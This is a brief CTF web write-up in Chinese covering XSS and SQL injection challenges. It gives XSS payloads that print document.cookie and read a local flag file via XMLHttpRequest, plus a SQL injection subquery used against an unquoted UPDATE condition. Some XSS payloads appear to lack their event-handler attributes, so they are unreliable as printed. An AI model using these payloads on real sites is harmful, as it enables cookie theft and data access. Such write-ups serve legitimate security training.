CTF-web-writeup
babyxss
触发js语句:
<img src=1 document.write(document.cookie)>
<input "document.write(document.cookie)" autofocus>
babyxss2
<img src=1 "var a=new XMLHttpRequest();a.open('GET','file:///var/www/html/flag.php',false);a.send(null);document.write('<textarea rows=10 cols=70>' + a.responseText+'</textarea>');">
put
calculate
Sqli_update
拿到题先扫一扫看看有没有什么页面,发现有网站的源码,便审计一波
发现update.php页面中的SQL语句update中条件变量无单引号保护,存在SQL注入漏洞
注册账号,更新表单,抓包,构造插入语句,但却显示更新失败,便在本地做起调试
参考链接:
https://blog.****.net/priestmoon/article/details/8016121
https://blog.****.net/cao478208248/article/details/28122113
最终payload:
select description from (select * from users where username=0x61646d696e)as a
审查网页元素便可得flag